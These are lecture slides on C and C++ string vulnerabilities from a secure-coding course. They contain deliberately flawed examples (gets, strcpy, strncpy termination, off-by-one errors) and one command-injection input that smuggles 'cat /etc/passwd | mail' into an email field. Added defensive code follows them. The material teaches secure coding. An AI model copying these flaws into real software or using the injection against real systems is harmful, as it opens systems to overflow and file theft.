Pitt IS 2620 - String Vulnerabilities

Secure Coding in C and C++: String Vulnerabilities (Lecture 3)

Acknowledgement: These slides are based on author Seacord's original presentation.

Note
- Ideas presented in the book generalize, but the examples are specific to
  - Microsoft Visual Studio
  - Linux/GCC
  - 32-bit Intel Architecture (IA-32)

Issues
- Strings
  - Background and common issues
- Common String Manipulation Errors
- String Vulnerabilities
- Mitigation Strategies

Strings
- Comprise most of the data exchanged between an end user and a software system
  - command-line arguments
  - environment variables
  - console input
- Software vulnerabilities and exploits are caused by weaknesses in
  - string representation
  - string management
  - string manipulation

C-Style Strings
- Strings are a fundamental concept in software engineering, but they are not a built-in type in C or C++.
- C-style strings consist of a contiguous sequence of characters terminated by and including the first null character.
- A pointer to a string points to its initial character.
- String length is the number of bytes preceding the null character.
- The string value is the sequence of the values of the contained characters, in order.
- The number of bytes required to store a string is the number of characters plus one (times the size of each character).
[Figure: the array h e l l o \0, with "length" spanning the characters before the null.]

C++ Strings
- The standardization of C++ has promoted
  - the standard template class std::basic_string
  - and its char instantiation std::string
- The basic_string class is less prone to security vulnerabilities than C-style strings.
- C-style strings are still a common data type in C++ programs.
- It is impossible to avoid having multiple string types in a C++ program except in rare circumstances:
  - there are no string literals
  - there is no interaction with existing libraries that accept C-style strings, OR only C-style strings are used

Common String Manipulation Errors
- Programming with C-style strings, in C or C++, is error prone.
- Common errors include
  - Unbounded string copies
  - Null-termination errors
  - Truncation
  - Write outside array bounds
  - Off-by-one errors
  - Improper data sanitization

Unbounded String Copies
- Occur when data is copied from an unbounded source to a fixed-length character array:

```c
#include <stdio.h>

int main(void) {
  char Password[80];
  puts("Enter 8 character password:");
  gets(Password);   /* no bound: input longer than 79 characters overflows Password */
  /* ... */
}
```

Copying and Concatenation
- It is easy to make errors when copying and concatenating strings because the standard functions do not know the size of the destination buffer:

```c
#include <string.h>

int main(int argc, char *argv[]) {
  char name[2048];
  strcpy(name, argv[1]);   /* the size of name is never checked against the input */
  strcat(name, " = ");
  strcat(name, argv[2]);
  /* ... */
}
```

Simple Solution
- Test the length of the input using strlen() and dynamically allocate the memory:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
  char *buff = (char *)malloc(strlen(argv[1])+1);   /* +1 for the null terminator */
  if (buff != NULL) {
    strcpy(buff, argv[1]);
    printf("argv[1] = %s.\n", buff);
  }
  else {
    /* Couldn't get the memory - recover */
  }
  return 0;
}
```

C++ Unbounded Copy
- Inputting more than 11 characters into the following C++ program results in an out-of-bounds write:

```cpp
#include <iostream>   // the original slide used the pre-standard <iostream.h>
using namespace std;

int main(void) {
  char buf[12];
  cin >> buf;         // no width limit: extraction writes past buf on long input
  cout << "echo: " << buf << endl;
}
```

Simple Solution

```cpp
#include <iostream>
using namespace std;

int main() {
  char buf[12];
  cin.width(12);      // at most 11 characters are stored, plus the null
  cin >> buf;
  cout << "echo: " << buf << endl;
}
```

- The extraction operation can be limited to a specified number of characters if ios_base::width is set to a value > 0.
- After a call to the extraction operation, the value of the width field is reset to 0.

Null-Termination Errors
- Another common problem with C-style strings is a failure to properly null terminate:

```c
#include <string.h>

int main(int argc, char* argv[]) {
  char a[16];
  char b[16];
  char c[32];
  strncpy(a, "0123456789abcdef", sizeof(a));   /* 16 characters fill a[] with no room for a null */
  strncpy(b, "0123456789abcdef", sizeof(b));
  strncpy(c, a, sizeof(c));                    /* reads beyond a[] looking for a null */
}
```

- Neither a[] nor b[] is properly terminated.

From ISO/IEC 9899:1999, the strncpy function

  char *strncpy(char * restrict s1, const char * restrict s2, size_t n);

- copies not more than n characters (characters that follow a null character are not copied) from the array pointed to by s2 to the array pointed to by s1.*
- *Thus, if there is no null character in the first n characters of the array pointed to by s2, the result will not be null-terminated.

String Truncation
- Functions that restrict the number of bytes are often recommended to mitigate against buffer overflow vulnerabilities
  - strncpy() instead of strcpy()
  - fgets() instead of gets()
  - snprintf() instead of sprintf()
- Strings that exceed the specified limits are truncated.
- Truncation results in a loss of data and, in some cases, in software vulnerabilities.

Write Outside Array Bounds

```c
#include <stdio.h>

int main(int argc, char *argv[]) {
  int i = 0;
  char buff[128];
  char *arg1 = argv[1];
  while (arg1[i] != '\0' ) {   /* the loop is bounded by the source, not by buff */
    buff[i] = arg1[i];
    i++;
  }
  buff[i] = '\0';
  printf("buff = %s\n", buff);
}
```

- Because C-style strings are character arrays, it is possible to perform an insecure string operation without invoking a function.

Off-by-One Errors
- Can you find all the off-by-one errors in this program?

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char* argv[]) {
  char source[10];
  strcpy(source, "0123456789");
  char *dest = (char *)malloc(strlen(source));
  int i;   /* declared here so a conforming compiler accepts the use of i after the loop */
  for (i=1; i <= 11; i++) {
    dest[i] = source[i];
  }
  dest[i] = '\0';
  printf("dest = %s", dest);
}
```

Improper Data Sanitization
- An application inputs an email address from a user and writes the address to a buffer [Viega 03]:

  sprintf(buffer, "/bin/mail %s < /tmp/email", addr);

- The buffer is then executed using the system() call.
- The risk is, of course, that the user enters the following string as an email address:

  [email protected]; cat /etc/passwd | mail [email protected]

[Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.

Program Stacks
- A program stack is used to keep track of program execution and state by storing
  - the return address in the calling function
  - arguments to the functions
  - local variables (temporary)
- The stack is modified
  - during function calls
  - during function initialization
  - when returning from a subroutine
[Figure: process memory layout showing the Code, Data, Heap and Stack segments.]

Stack Segment
- The stack supports nested invocation calls.
- Information pushed on the stack as a result of a function call is called a frame.
[Figure: stack frames for main(), a() and b() laid out from high memory to low memory, followed by unallocated space; main() calls a(), which calls b().]
- A stack frame is created for each subroutine and destroyed upon return.

Stack
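The following is an added example, not code from the lecture or from Seacord's book. It gathers the defensive counterparts of the Unbounded String Copies, Null-Termination, Truncation, Write Outside Array Bounds and Off-by-One slides: a character-by-character copy whose loop index is bounded by the destination and which always terminates and reports truncation, a check that exposes strncpy()'s missing null, and the "name = value" concatenation rebuilt on a heap buffer whose size is computed, with wrap-around checked, from the inputs. The function names are the example's own.

```c
/* Added example (not from the lecture): bounded copy that always null-terminates
 * and reports truncation, a strncpy() termination check, and a dynamically sized
 * concatenation that replaces the slide's strcpy()/strcat() into name[2048]. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Copies src into dst[dstsize] without ever writing past dst[dstsize-1] and
 * always terminating. Returns 1 if src was truncated, 0 otherwise. */
int bounded_copy(char *dst, size_t dstsize, const char *src) {
  size_t i;
  if (dstsize == 0) return 1;                    /* nothing can be stored at all */
  for (i = 0; i + 1 < dstsize && src[i] != '\0'; i++) {
    dst[i] = src[i];                             /* i is at most dstsize-2 here */
  }
  dst[i] = '\0';                                 /* i <= dstsize-1: always in bounds */
  return src[i] != '\0';                         /* source had characters left over */
}

/* Mirrors the null-termination slide: 1 if strncpy() left buf[n] with no null. */
int strncpy_unterminated(const char *src, char *buf, size_t n) {
  strncpy(buf, src, n);
  return memchr(buf, '\0', n) == NULL;
}

/* Builds "a = b" in a heap buffer sized from the inputs; the length arithmetic
 * is checked for wrap-around first. Caller frees the result; NULL on failure. */
char *join_alloc(const char *a, const char *b) {
  size_t la = strlen(a), lb = strlen(b);
  const size_t sep = 3;                          /* strlen(" = ") */
  if (lb > SIZE_MAX - sep - 1) return NULL;      /* lb + sep + 1 would wrap */
  if (la > SIZE_MAX - sep - 1 - lb) return NULL; /* total would wrap */
  char *out = malloc(la + sep + lb + 1);
  if (out == NULL) return NULL;
  memcpy(out, a, la);
  memcpy(out + la, " = ", sep);
  memcpy(out + la + sep, b, lb + 1);             /* lb + 1 copies b's null as well */
  return out;
}
```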
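For the Improper Data Sanitization slide, an added example that is not part of the lecture: the address is checked against a conservative allowlist before it is placed in the /bin/mail command line, and sprintf() is replaced by snprintf() with its return value checked so truncation is detected rather than silently accepted. The allowlist, the MAX_ADDR bound and the function names are this example's assumptions; the stronger mitigation is to avoid the shell entirely by passing the address as a separate argument to an exec-style call, which this example does not show.

```c
/* Added example (not from the lecture): allowlist validation of the address and a
 * bounded, checked snprintf() in place of the slide's sprintf() into buffer. */
#include <stdio.h>
#include <string.h>

#define MAX_ADDR 254   /* assumed upper bound on an address length */

/* Returns 1 if addr is non-empty, within MAX_ADDR, built only from allowlisted
 * characters and contains exactly one '@'. Shell metacharacters such as
 * ';', '|', '<', '`' and '$' are not in the allowlist, so they are rejected. */
int addr_is_safe(const char *addr) {
  const char *allowed = "abcdefghijklmnopqrstuvwxyz"
                        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                        "0123456789.-_+@";
  size_t len = strlen(addr), at = 0, i;
  if (len == 0 || len > MAX_ADDR) return 0;
  for (i = 0; i < len; i++) {
    if (strchr(allowed, addr[i]) == NULL) return 0;   /* addr[i] is never '\0' here */
    if (addr[i] == '@') at++;
  }
  return at == 1;
}

/* Formats the command into cmd[n]. Returns 1 on success, 0 if the address is
 * rejected or the result would not fit (snprintf() reports the size it needed). */
int build_mail_cmd(char *cmd, size_t n, const char *addr) {
  int needed;
  if (!addr_is_safe(addr)) return 0;
  needed = snprintf(cmd, n, "/bin/mail %s < /tmp/email", addr);
  return needed >= 0 && (size_t)needed < n;
}
```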